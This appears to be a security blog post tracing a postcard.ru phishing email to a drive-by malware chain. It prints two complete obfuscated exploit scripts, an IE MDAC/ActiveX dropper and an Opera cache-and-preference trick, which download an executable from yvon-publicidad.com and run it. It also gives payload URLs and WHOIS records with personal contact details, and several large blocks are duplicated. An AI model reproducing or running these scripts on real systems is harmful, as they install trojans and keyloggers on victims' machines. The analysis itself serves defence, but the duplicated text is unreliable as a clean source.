I received another e-mail today, and I must admit, it's been a while since I've received one of these, but nevertheless, the e-mail claimed to come from postcard.ru;
Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'
Служба рассылки открыток POSTCARD.RU
------------------------------------------------
You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'
Postcard service POSTCARD.RU
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'
Служба рассылки открыток POSTCARD.RU
------------------------------------------------
You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'
Postcard service POSTCARD.RU
savichev.com (89.108.94.111, PTR: server5.pwstudio.ru) is the first site we see. This loads an iframe pointing to twain32.cn;
<iframe name="ABNHosting" src="http://www.twain32.cn/img/out.php?s_id=1&s=card" frameborder="0" border="0" height="1" width="100"></iframe>
Ref:
http://vurl.mysteryfcm.co.uk/?url=132594
If you are using IE7 then twain32.cn returns the following;
<script>
// Object-factory helper used by the stages below.
// Tries, in turn, every CreateObject/GetObject call shape on the host
// object `os` until one yields a COM object for the ProgID `nz`; each
// attempt is wrapped in eval() plus an empty catch, so a failed attempt is
// silently ignored and the next one runs. Returns the object, or null when
// every attempt failed. The eval() indirection adds nothing functionally;
// presumably it exists to evade plain-text signature matching, which makes
// eval('... CreateObject ...') itself a useful detection hint.
function CreateO(os, nz)
{
var e0 = null;
// Attempt 1: CreateObject(ProgID)
try
{
eval('e0 = os.CreateObject(nz)')
}
catch(e)
{
}
// Attempt 2: CreateObject(ProgID, "") -- only reached if e0 is still null
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "")')
}
catch(e)
{
}
}
// Attempt 3: CreateObject(ProgID, "", "")
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "", "")')
}
catch(e)
{
}
}
// Attempt 4: GetObject("", ProgID)
if (! e0)
{
try
{
eval('e0 = os.GetObject("", nz)')
}
catch(e)
{
}
}
// Attempt 5: GetObject(ProgID, "")
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz, "")')
}
catch(e)
{
}
}
// Attempt 6: GetObject(ProgID)
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz)')
}
catch(e)
{
}
}
// null when no call shape succeeded; callers test for truthiness.
return(e0);
}
// Drop-and-run stage. Through the host object `a` it obtains an XMLHTTP
// object, fetches the payload URL synchronously, writes the response body
// to disk with an ADODB.Stream object and launches the file via
// Shell.Application. All three ProgIDs are assembled by string
// concatenation ('m'+'sxm'+'l2'...), presumably to defeat literal matching;
// the decoded ProgIDs (msxml2.XMLHTTP, adodb.stream, Shell.Application)
// are the strings a scanner should look for. Note the function has no
// return statement, so the caller's `if (Download(a)) break;` never breaks.
function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
// Third argument false = synchronous request; the body is available right
// after send().
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
// ADODB.Stream constants as used here: type 1 = binary, Mode 3 = read/write,
// savetoFile(..., 2) = create-or-overwrite.
o.type = 1;
o.Mode = 3;
o.open();
o.Write(lm.responseBody);
// Relative path; the dropped file lands next to (one level above) the
// current directory of the browser process.
var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
// Executes the dropped file; no return value reaches the caller.
s.Shellexecute(tut);
}
// Driver loop over the target list `t`. Entries starting with '{' are
// treated as CLSIDs and instantiated through an <object> element with a
// classid attribute; anything else would go through new ActiveXObject(),
// although only two CLSID entries and the terminating null are listed.
// Both CLSIDs are built by concatenation; NOTE(review): they look like the
// well-known MDAC RDS control identifiers -- confirm against a CLSID
// reference. For each object that can hand back Shell.Application via
// CreateO, Download(a) is called. Because Download returns undefined, the
// `break` never fires and every entry is attempted.
var x = 0;
var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
// The null sentinel at the end of `t` ends the loop.
while (t[x])
{
var a = null;
if (t[x].substring(0,1) == '{')
{
a = document.createElement('object');
// Strips the leading '{' only; the trailing '}' is kept in the attribute.
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}
else
{
try
{
a = new ActiveXObject(t[x]);
}
catch(e)
{
}
}
if (a)
{
try
{
// Probe: can this object create Shell.Application? If so, run the dropper.
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b)
{
if (Download(a)) break;
}
}
catch(e)
{
}
}
x++;
}
// After 2.5 s the page navigates to 'jav.php', presumably a further stage;
// that page is not shown here. String-argument setTimeout is itself an eval.
setTimeout("window.location = 'jav.php'", 2500);
</script>
</body>
</html>
// Object-factory helper used by the stages below.
// Tries, in turn, every CreateObject/GetObject call shape on the host
// object `os` until one yields a COM object for the ProgID `nz`; each
// attempt is wrapped in eval() plus an empty catch, so a failed attempt is
// silently ignored and the next one runs. Returns the object, or null when
// every attempt failed. The eval() indirection adds nothing functionally;
// presumably it exists to evade plain-text signature matching, which makes
// eval('... CreateObject ...') itself a useful detection hint.
function CreateO(os, nz)
{
var e0 = null;
// Attempt 1: CreateObject(ProgID)
try
{
eval('e0 = os.CreateObject(nz)')
}
catch(e)
{
}
// Attempt 2: CreateObject(ProgID, "") -- only reached if e0 is still null
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "")')
}
catch(e)
{
}
}
// Attempt 3: CreateObject(ProgID, "", "")
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "", "")')
}
catch(e)
{
}
}
// Attempt 4: GetObject("", ProgID)
if (! e0)
{
try
{
eval('e0 = os.GetObject("", nz)')
}
catch(e)
{
}
}
// Attempt 5: GetObject(ProgID, "")
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz, "")')
}
catch(e)
{
}
}
// Attempt 6: GetObject(ProgID)
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz)')
}
catch(e)
{
}
}
// null when no call shape succeeded; callers test for truthiness.
return(e0);
}
// Drop-and-run stage. Through the host object `a` it obtains an XMLHTTP
// object, fetches the payload URL synchronously, writes the response body
// to disk with an ADODB.Stream object and launches the file via
// Shell.Application. All three ProgIDs are assembled by string
// concatenation ('m'+'sxm'+'l2'...), presumably to defeat literal matching;
// the decoded ProgIDs (msxml2.XMLHTTP, adodb.stream, Shell.Application)
// are the strings a scanner should look for. Note the function has no
// return statement, so the caller's `if (Download(a)) break;` never breaks.
function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
// Third argument false = synchronous request; the body is available right
// after send().
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
// ADODB.Stream constants as used here: type 1 = binary, Mode 3 = read/write,
// savetoFile(..., 2) = create-or-overwrite.
o.type = 1;
o.Mode = 3;
o.open();
o.Write(lm.responseBody);
// Relative path; the dropped file lands next to (one level above) the
// current directory of the browser process.
var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
// Executes the dropped file; no return value reaches the caller.
s.Shellexecute(tut);
}
// Driver loop over the target list `t`. Entries starting with '{' are
// treated as CLSIDs and instantiated through an <object> element with a
// classid attribute; anything else would go through new ActiveXObject(),
// although only two CLSID entries and the terminating null are listed.
// Both CLSIDs are built by concatenation; NOTE(review): they look like the
// well-known MDAC RDS control identifiers -- confirm against a CLSID
// reference. For each object that can hand back Shell.Application via
// CreateO, Download(a) is called. Because Download returns undefined, the
// `break` never fires and every entry is attempted.
var x = 0;
var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
// The null sentinel at the end of `t` ends the loop.
while (t[x])
{
var a = null;
if (t[x].substring(0,1) == '{')
{
a = document.createElement('object');
// Strips the leading '{' only; the trailing '}' is kept in the attribute.
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}
else
{
try
{
a = new ActiveXObject(t[x]);
}
catch(e)
{
}
}
if (a)
{
try
{
// Probe: can this object create Shell.Application? If so, run the dropper.
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b)
{
if (Download(a)) break;
}
}
catch(e)
{
}
}
x++;
}
// After 2.5 s the page navigates to 'jav.php', presumably a further stage;
// that page is not shown here. String-argument setTimeout is itself an eval.
setTimeout("window.location = 'jav.php'", 2500);
</script>
</body>
</html>
If you are using Opera, you get the following;
<script language=javascript>
// Opera branch. Step 1: create a hidden about:blank iframe whose id is
// 'blank_iframe_window'. Every literal is split by '+' concatenation,
// presumably to defeat literal signature matching. `blank_iframe` is an
// implicit global (no var).
blank_iframe = document.createElement('if'+'ra'+'me');
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');
document.appendChild(blank_iframe);
// Step 2: run the rest of the logic inside that iframe via eval() on the
// global `blank_iframe_window` (NOTE(review): this presumably resolves
// through the element id set above -- confirm for the targeted Opera
// version). The string, spanning the backslash-continued lines below, does
// the following in order: opens a second iframe on opera:config; injects a
// <script> element (misleadingly named app_iframe) whose src is the payload
// URL, so the file is fetched into the browser cache; on load, opens
// opera:cache and regex-matches the cache listing for an 'OPR?????.EXE'
// entry tied to that URL; then, inside the opera:config frame, points the
// 'TN3270 App' preference at the cached file, clicks a tn3270:// link so the
// handler launches it, and after 1 s restores the preference to telnet.exe.
// `cache` and `filename` are also implicit globals. Detection hint: web
// content touching opera:config / opera.setPreference is the distinctive
// behaviour here.
blank_iframe_window.eval
("config_iframe = document.createElement('if'+'ra'+'me');\
config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\
config_iframe.src = 'op'+'era:c'+'on'+'fig';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('sc'+'ri'+'pt');\
cache_iframe = document.createElement('if'+'ra'+'me');\
app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'op'+'er'+'a:c'+'ache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
</body>
</html>
// Opera branch. Step 1: create a hidden about:blank iframe whose id is
// 'blank_iframe_window'. Every literal is split by '+' concatenation,
// presumably to defeat literal signature matching. `blank_iframe` is an
// implicit global (no var).
blank_iframe = document.createElement('if'+'ra'+'me');
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');
document.appendChild(blank_iframe);
// Step 2: run the rest of the logic inside that iframe via eval() on the
// global `blank_iframe_window` (NOTE(review): this presumably resolves
// through the element id set above -- confirm for the targeted Opera
// version). The string, spanning the backslash-continued lines below, does
// the following in order: opens a second iframe on opera:config; injects a
// <script> element (misleadingly named app_iframe) whose src is the payload
// URL, so the file is fetched into the browser cache; on load, opens
// opera:cache and regex-matches the cache listing for an 'OPR?????.EXE'
// entry tied to that URL; then, inside the opera:config frame, points the
// 'TN3270 App' preference at the cached file, clicks a tn3270:// link so the
// handler launches it, and after 1 s restores the preference to telnet.exe.
// `cache` and `filename` are also implicit globals. Detection hint: web
// content touching opera:config / opera.setPreference is the distinctive
// behaviour here.
blank_iframe_window.eval
("config_iframe = document.createElement('if'+'ra'+'me');\
config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\
config_iframe.src = 'op'+'era:c'+'on'+'fig';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('sc'+'ri'+'pt');\
cache_iframe = document.createElement('if'+'ra'+'me');\
app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'op'+'er'+'a:c'+'ache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
</body>
</html>
Ref:
http://vurl.mysteryfcm.co.uk/?url=132605
twain32.cn resolves to the IP 195.5.116.239, which has a PTR that shows: src.esthost.eu (IP: 195.5.116.239). Alas, Whois.eu doesn't seem to allow remote WhoIs lookups, so we've gone to eurid.eu instead. No problem. Doing a WhoIs lookup on esthost.eu, we see;
Domain
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm
Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
PAE 21
11415 Tallinn
EE
Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu
Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
14525 SW Millikan #48732
97005-2343 Beaverton
Oregon
United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com
Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com
Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm
Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
PAE 21
11415 Tallinn
EE
Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu
Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
14525 SW Millikan #48732
97005-2343 Beaverton
Oregon
United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com
Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com
Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)
Net-block information:
inetnum: 195.5.116.0 - 195.5.117.255
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered
organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered
person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered
% Information related to '195.5.116.0/23AS39823'
route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered
organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered
person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered
% Information related to '195.5.116.0/23AS39823'
route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered
Getting back to the infection, however: this comes courtesy of yvon-publicidad.com, as you can see in the above source code;
http://www.yvon-publicidad.com/images/images.php?w=0&e=2
This drops a 1.95K file called mstelnet.exe (FSG packed), which Avira flagged as;
This, according to ThreatExpert, downloads the following;
http://www.yvon-publicidad.com/images/images.php?w=1 (7.12K - HIDDENEXT/Crypted)
http://www.yvon-publicidad.com/images/images.php?w=2 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=3 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=4 (27K - TR/Crypt.Morphine.Gen)
Ref:
http://www.threatexpert.com/report.aspx?md5=cbec5204eddd57aadc4b09d6d1a0a003
The report makes for very interesting reading, as it shows an injection into the IE process (it injects mswapi.dll), trojans and keyloggers - oh, the fun!
WhoIs for the domain shows;
Registrant:
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France
Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France
Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08
A little searching turned up a couple of other possibly related (previous versions?) reports;
http://www.threatexpert.com/report.aspx?uid=d0ce4715-e6e2-4a3e-b4e0-69a2fb7698cb
http://research.sunbelt-software.com/ViewMalware.aspx?id=2787949